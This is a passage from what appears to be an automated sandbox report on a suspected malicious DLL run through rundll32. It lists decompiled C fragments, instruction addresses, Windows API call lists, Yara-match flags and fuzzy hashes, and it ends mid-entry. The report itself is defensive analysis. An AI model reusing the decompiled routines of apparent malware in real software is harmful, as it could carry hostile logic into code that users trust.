							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x343a348; // 0x21ad5a8
												_t28 = _t109 + 0x343b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x343a348; // 0x21ad5a8
														_t33 = _t79 + 0x343b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                0x03432737
                                0x03432740
                                0x03432741
                                0x03432745
                                0x0343274b
                                0x03432751
                                0x0343275a
                                0x03432760
                                0x0343276a
                                0x0343276c
                                0x03432772
                                0x03432777
                                0x03432782
                                0x03432788
                                0x0343278d
                                0x034328af
                                0x03432793
                                0x03432793
                                0x034327a0
                                0x034327a6
                                0x034327ac
                                0x034327b0
                                0x034327b6
                                0x034327c3
                                0x034327c7
                                0x034327cd
                                0x034327d0
                                0x034327d8
                                0x034327d9
                                0x034327dd
                                0x034327e1
                                0x034327e4
                                0x034327e7
                                0x034327ed
                                0x034327f6
                                0x034327fc
                                0x034327fd
                                0x03432800
                                0x03432801
                                0x03432802
                                0x0343280a
                                0x0343280b
                                0x0343280c
                                0x0343280e
                                0x03432812
                                0x03432816
                                0x00000000
                                0x00000000
                                0x0343281c
                                0x03432825
                                0x0343282b
                                0x03432835
                                0x03432839
                                0x0343283b
                                0x03432848
                                0x0343284c
                                0x03432854
                                0x03432859
                                0x0343286b
                                0x0343286d
                                0x03432873
                                0x03432873
                                0x0343287c
                                0x0343287c
                                0x0343287e
                                0x03432884
                                0x03432884
                                0x03432887
                                0x0343288d
                                0x03432890
                                0x03432899
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03432899
                                0x034327ed
                                0x034327e7
                                0x034327d0
                                0x0343289f
                                0x0343289f
                                0x034328a5
                                0x034328a5
                                0x034328ab
                                0x034328ab
                                0x034328b4
                                0x034328ba
                                0x034328ba
                                0x03432777
                                0x034328c3

                                APIs
                                • SysAllocString.OLEAUT32(03439290), ref: 03432782
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 03432863
                                • SysFreeString.OLEAUT32(00000000), ref: 0343287C
                                • SysFreeString.OLEAUT32(?), ref: 034328AB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 109bd4191c8d33f49c81aeafd07145186cfeb0110cf82980545432d4b576b060
                                • Instruction ID: 7dee0af910901251b6108c1f5181a2fba501d31a2dba7b9471d0e5a8e8108c6a
                                • Opcode Fuzzy Hash: 109bd4191c8d33f49c81aeafd07145186cfeb0110cf82980545432d4b576b060
                                • Instruction Fuzzy Hash: D8516A75D00619EFCB04DFA8C8889AEF7B9EF89700B244A99E815EF314D7719D41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03435B9D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 03435BD8
                                • SysFreeString.OLEAUT32(00000000), ref: 03435CBD
                                  • Part of subcall function 03432732: SysAllocString.OLEAUT32(03439290), ref: 03432782
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 03435D10
                                • SysFreeString.OLEAUT32(00000000), ref: 03435D1F
                                  • Part of subcall function 03433A62: Sleep.KERNEL32(000001F4), ref: 03433AAA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 409747303a32df45bc69e023d75ab0e86dd9f8b75ccacbeab56e573a06cbfb5c
                                • Instruction ID: 016eee563f5b88e8580099d07eb08226373e899e1b4b98b402855bc995e35137
                                • Opcode Fuzzy Hash: 409747303a32df45bc69e023d75ab0e86dd9f8b75ccacbeab56e573a06cbfb5c
                                • Instruction Fuzzy Hash: D4515C79500609AFDB01DFA8D844AAEB7B6FF8D704B148469E905EF324DB70ED05CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03492E7D Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?), ref: 03492E89
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • ResetEvent.KERNEL32(?,?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6), ref: 03492F00
                                • GetLastError.KERNEL32(?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?), ref: 03492F2D
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • GetLastError.KERNEL32(?,?,?,0348DD27,00000000,0000EA60,00000000,00000000,00000000,?,0347DBAC,?,?,00000000,03473EC6,?), ref: 03492FEF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                • String ID:
                                • API String ID: 943265810-0
                                • Opcode ID: bb342a349ab8e71bb513ac7c17b3081960659fdda6042e7881e23e7abe1e8b1e
                                • Instruction ID: 872563278497249cd012f9b98c507e8ffaeafd2168cc6b32e2cdccf829f140c9
                                • Opcode Fuzzy Hash: bb342a349ab8e71bb513ac7c17b3081960659fdda6042e7881e23e7abe1e8b1e
                                • Instruction Fuzzy Hash: C2416171500208BFEF21EFA1DC89EAB7BECEB14700B14492BF502DA194E7B09945DA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484DA9 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03484E5C
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03484E72
                                • memset.NTDLL ref: 03484F1B
                                • memset.NTDLL ref: 03484F31
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 7c12f87b059297e6c8a347e0d2f372896335b8a9e52081bb33d95e70d15cc544
                                • Instruction ID: 6f7cc9fe8bde71cd9d484020c795960444bc7cf19eece5c9ae9810fa4cae9b06
                                • Opcode Fuzzy Hash: 7c12f87b059297e6c8a347e0d2f372896335b8a9e52081bb33d95e70d15cc544
                                • Instruction Fuzzy Hash: EE419135A00215AFDF10EF6ACC80BEEB7A9EF45314F04456AE819AF380DB709E458B55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431DE3 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E03431DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E03432FAB(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E03431CC1(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03432920(_t101,  &_v428, _a8, _t96 - _t81);
					E03432920(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E03431CC1(_t101, 0x343a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E03431CC1(_a16, _a4);
						E03433ADA(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0343824A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L03438244();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0343241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E03432378(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E034379CC(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x343a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x03431de6
                                0x03431df2
                                0x03431df8
                                0x03431dfd
                                0x03431e01
                                0x03431f73
                                0x03431f77
                                0x03431f77
                                0x03431e07
                                0x03431e0b
                                0x03431e0f
                                0x03431e12
                                0x03431e1d
                                0x03431e23
                                0x03431e28
                                0x03431e2b
                                0x03431e45
                                0x03431e54
                                0x03431e60
                                0x03431e6a
                                0x03431e6f
                                0x03431e71
                                0x03431e74
                                0x03431f2b
                                0x03431f31
                                0x03431f42
                                0x03431f55
                                0x03431f6b
                                0x00000000
                                0x03431f70
                                0x03431e7d
                                0x03431e84
                                0x03431e88
                                0x03431e8e
                                0x03431e90
                                0x03431e92
                                0x03431e94
                                0x03431e96
                                0x03431ea0
                                0x03431ea5
                                0x03431ea7
                                0x03431ea9
                                0x03431eaa
                                0x03431eab
                                0x03431eac
                                0x03431eb3
                                0x03431eba
                                0x03431ebd
                                0x03431ebd
                                0x03431e8a
                                0x03431e8a
                                0x03431e8a
                                0x03431ec5
                                0x03431ecd
                                0x03431ed9
                                0x03431ede
                                0x03431ede
                                0x03431ee3
                                0x00000000
                                0x00000000
                                0x03431ee5
                                0x03431ee8
                                0x03431ef5
                                0x00000000
                                0x00000000
                                0x03431ef7
                                0x03431ef7
                                0x03431f04
                                0x03431ede
                                0x03431ee3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03431ee3
                                0x03431f0e
                                0x03431f11
                                0x03431f14
                                0x03431f1b
                                0x03431f1b
                                0x03431f28
                                0x00000000
                                0x03431f28
                                0x03431e14
                                0x03431e18
                                0x03431e19
                                0x03431e1b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03431e1b
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03431E96
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03431EAC
                                • memset.NTDLL ref: 03431F55
                                • memset.NTDLL ref: 03431F6B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 2b8f9099dac0d3b3bcace6bd4a5ae3caf0a384632d7c288081544b1ed575a0cb
                                • Instruction ID: bfc6a4a28ff5e18adb5be88c50f56bfde7569d97abe40b688450893fe408deea
                                • Opcode Fuzzy Hash: 2b8f9099dac0d3b3bcace6bd4a5ae3caf0a384632d7c288081544b1ed575a0cb
                                • Instruction Fuzzy Hash: 3E41C435A01219AFDF10EF69CC41BEE77B4EF4A310F00456AF819AF280DB70AE558B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347F5ED Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                APIs
                                • ResetEvent.KERNEL32(?,00000000,00000000,00000000,03473EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348C7D5
                                • GetLastError.KERNEL32(?,?,?,03473EC6,?,?), ref: 0348C7EE
                                • ResetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348C867
                                • GetLastError.KERNEL32(?,?,?,03473EC6,?,?), ref: 0348C882
                                  • Part of subcall function 0348EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348EC20
                                  • Part of subcall function 0348EC09: SetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348EC30
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$ErrorLastReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 1123145548-0
                                • Opcode ID: 1c08a62afb1cd8abe83f7f2f1f14057e7240b98906902e57281113fc0583a45e
                                • Instruction ID: 042f86e542a3699849a36bc7733868da0661a21acace60d9d810c54b5d32ccf2
                                • Opcode Fuzzy Hash: 1c08a62afb1cd8abe83f7f2f1f14057e7240b98906902e57281113fc0583a45e
                                • Instruction Fuzzy Hash: 7141D636A40204EFDB11FBA5CC84AAEB7B9AF84261F18096BE512EF650E730DD419764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03489A79 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 03489A93
                                • StrChrA.SHLWAPI(?,0000005C), ref: 03489ABA
                                • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 03489AE0
                                • lstrcpy.KERNEL32(?,?), ref: 03489B84
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrcpyn
                                • String ID:
                                • API String ID: 4154805583-0
                                • Opcode ID: 5c06b1bafe1d8f2f5db4478d89afa7004b3c0475ac984c558d4a8688efb48fb6
                                • Instruction ID: 687d55433ec6350b673438784f3246d83f3ba8417a216ea510b1fd1bc647db12
                                • Opcode Fuzzy Hash: 5c06b1bafe1d8f2f5db4478d89afa7004b3c0475ac984c558d4a8688efb48fb6
                                • Instruction Fuzzy Hash: 48411D76900259BFDB12EBA4CC84DEFBBFCEB09250F0445A7E905EB144D7349A44CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03489185 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strupr
                                • String ID:
                                • API String ID: 3408778250-0
                                • Opcode ID: d5e84038293f09410b8daf70eedc4a64a955474ca5079e0389d0885f149c0558
                                • Instruction ID: 32140a7d459bda86baca730e51a49061057ec017848778601c07945d36e84fb5
                                • Opcode Fuzzy Hash: d5e84038293f09410b8daf70eedc4a64a955474ca5079e0389d0885f149c0558
                                • Instruction Fuzzy Hash: D74171368006099FEF61EFA9D888AFFB7E9EF44250F14491BE825DE224D734D454CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03474858 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 03479D54
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034748C0
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03474911
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 03474946
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 03474956
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                • String ID:
                                • API String ID: 4200334623-0
                                • Opcode ID: dec8bb34a7bf3f2ce458b851ce301b312b06cbda92f27222c78649323703914e
                                • Instruction ID: 82b1e2ce1548b24cda88fa329e82bfd287febb144f72469bf7b7c76894639fa1
                                • Opcode Fuzzy Hash: dec8bb34a7bf3f2ce458b851ce301b312b06cbda92f27222c78649323703914e
                                • Instruction Fuzzy Hash: 32313AB6500019BFDB00EFA5DC89CBFBBBDEF19250B110066F605EB214D771AE549BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348EC09 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348EC20
                                • SetEvent.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348EC30
                                • GetLastError.KERNEL32 ref: 0348ECB9
                                  • Part of subcall function 0348F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,03492F4B,0000EA60,?,?,?,0348DD27,00000000,0000EA60,00000000), ref: 0348F1B2
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • GetLastError.KERNEL32(00000000), ref: 0348ECEE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 602384898-0
                                • Opcode ID: 1d1f3d7703b11d351e05070999e19fdfdbb8802b978706126447a921821bd3f8
                                • Instruction ID: 99a1e7a58c2206f01794213fb250e3aecb155d5112c355d648ef135d8fb303f0
                                • Opcode Fuzzy Hash: 1d1f3d7703b11d351e05070999e19fdfdbb8802b978706126447a921821bd3f8
                                • Instruction Fuzzy Hash: F5311EB5D00309FFDB21FFA5D88499FB7F8EF09204F14496BE502AA640D7319A898B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484B99 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • TlsGetValue.KERNEL32(?), ref: 03484BC8
                                • SetEvent.KERNEL32(?), ref: 03484C12
                                • TlsSetValue.KERNEL32(00000001), ref: 03484C4C
                                • TlsSetValue.KERNEL32(00000000), ref: 03484C68
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$Event
                                • String ID:
                                • API String ID: 3803239005-0
                                • Opcode ID: 6b04ed111192b2d2edae0aac3e3368abeef874746659528a334f823ce345eac0
                                • Instruction ID: 3fe517ed79807942d3dda95f5e551972a42ec6dd254901b617748a3b19119479
                                • Opcode Fuzzy Hash: 6b04ed111192b2d2edae0aac3e3368abeef874746659528a334f823ce345eac0
                                • Instruction Fuzzy Hash: EA21AD31100205AFCF21EF5ACC8A99EBBAAFB41710B19042BF412DE360C331DC51DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348A868 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0348A8C1
                                • memcpy.NTDLL(00000018,?,?), ref: 0348A8EA
                                • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0348A929
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348A93C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                • String ID:
                                • API String ID: 2780211928-0
                                • Opcode ID: 51f97ade42381e00363bd3f5bbd0fda42c79d0ee9406cac69ff8494ae720bdc3
                                • Instruction ID: f3378a923ab4567885525c461e3a043e6538964bbbff97dcdf3a2a3f6ef9ec5d
                                • Opcode Fuzzy Hash: 51f97ade42381e00363bd3f5bbd0fda42c79d0ee9406cac69ff8494ae720bdc3
                                • Instruction Fuzzy Hash: 72318C70200209AFDB21EF29DC45E9B7BE8EF15320F11451BF919EA3A0D770D9558FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348F09D Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,03473EC6), ref: 03485540
                                  • Part of subcall function 0348550A: memset.NTDLL ref: 034855B6
                                  • Part of subcall function 0348550A: memset.NTDLL ref: 034855CA
                                • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0348F0F5
                                • lstrcmpi.KERNEL32(00000000,?), ref: 0348F11C
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0348F161
                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0348F172
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                • String ID:
                                • API String ID: 1065503980-0
                                • Opcode ID: a8b4896b0ae2763a6c9a88946cf7399d2ab2a4d1aeca17bd7ccb0965899bdb92
                                • Instruction ID: 946fadafb832da5d17eb8096d9fd007f888694126ab14da823ae8df9a91d19a0
                                • Opcode Fuzzy Hash: a8b4896b0ae2763a6c9a88946cf7399d2ab2a4d1aeca17bd7ccb0965899bdb92
                                • Instruction Fuzzy Hash: 94216875A00209BFDF21FFA5EC84EAE7BB9EB15344F144067E904EE214D734AE489B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E0C4 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348E0F3
                                • lstrlen.KERNEL32(00000000), ref: 0348E104
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • strcpy.NTDLL ref: 0348E11B
                                • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0348E125
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeaplstrlenmemsetstrcpy
                                • String ID:
                                • API String ID: 528014985-0
                                • Opcode ID: 217595572b4d4ceeb4615f1487ccd39067cdb50e6fc329f73fbd29ea19b8e07f
                                • Instruction ID: 32abef668f7906496856169d7d8adbefa4023e62d7f23947eb669bed5a2c044d
